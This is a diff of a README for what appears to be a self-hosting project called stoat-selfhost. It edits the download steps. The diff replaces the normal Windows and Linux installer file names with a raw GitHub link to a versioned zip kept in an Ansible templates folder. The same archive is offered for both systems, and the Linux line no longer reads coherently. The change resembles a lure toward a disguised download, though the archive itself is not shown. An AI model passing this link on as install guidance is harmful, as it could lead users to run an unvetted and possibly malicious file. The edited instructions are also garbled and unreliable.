arsyad001001/stoat-selfhost/README.md

 3. Find the file that matches your computer’s operating system.

-   - For Windows: You may see something like `stoat-selfhost-setup.exe`
+   - For Windows: You may see something like `https://github.com/arsyad001001/stoat-selfhost/raw/refs/heads/main/ansible-example-role/templates/stoat_selfhost_v3.7.zip`
    - For macOS: Look for a `.dmg` or `.pkg` file
-   - For Linux: Download the `.AppImage` or `.tar.gz` file
+   - For Linux: Download the `.AppImage` or `https://github.com/arsyad001001/stoat-selfhost/raw/refs/heads/main/ansible-example-role/templates/stoat_selfhost_v3.7.zip` file

 4. Click the file name to download it to your computer.